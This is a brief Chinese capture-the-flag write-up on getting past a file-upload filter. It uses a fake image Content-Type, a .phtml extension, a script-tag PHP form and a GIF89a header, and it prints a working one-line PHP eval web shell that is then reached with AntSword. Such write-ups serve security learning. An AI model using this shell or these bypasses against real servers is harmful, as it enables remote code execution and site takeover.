0x01　　題目

0x02　　解題過(guò)程

嘗試把一句話(huà)木馬原封不動(dòng)上傳，提示需要image。

 那行，咱繼續(xù)嘗試各種文件上傳姿勢(shì)。首先改Content-Type為image/jpeg。

 看來(lái)后綴名不能為php，那么再改各種后綴名試試，例如，php3,php4,php5,phtml,phar。我改成phtml。

 看來(lái)不能含有'<?', 那么我們就需要把php換一種格式了，看下圖：

 還是不行，叫我別騙他了窩。那行，那我再騙一波，加上gif的文件幻數(shù)，在PHP代碼前加上GIF89a:

GIF89a
<script language="php">
@eval($_POST['hacker']);
</script>

 搞定，但沒(méi)有顯示文件路徑，猜測(cè)在upload目錄下，于是嘗試訪問(wèn)：

 只看到GIF89a，但看不到腳本代碼，一般是成功了，用蟻劍嘗試連接：

 連上了以后直接在根目錄下找到flag，完成。

flag{2e58d7d7-b6c2-44a2-9890-aae4edfdbcfc}

最后，歡迎師傅們指正和討論~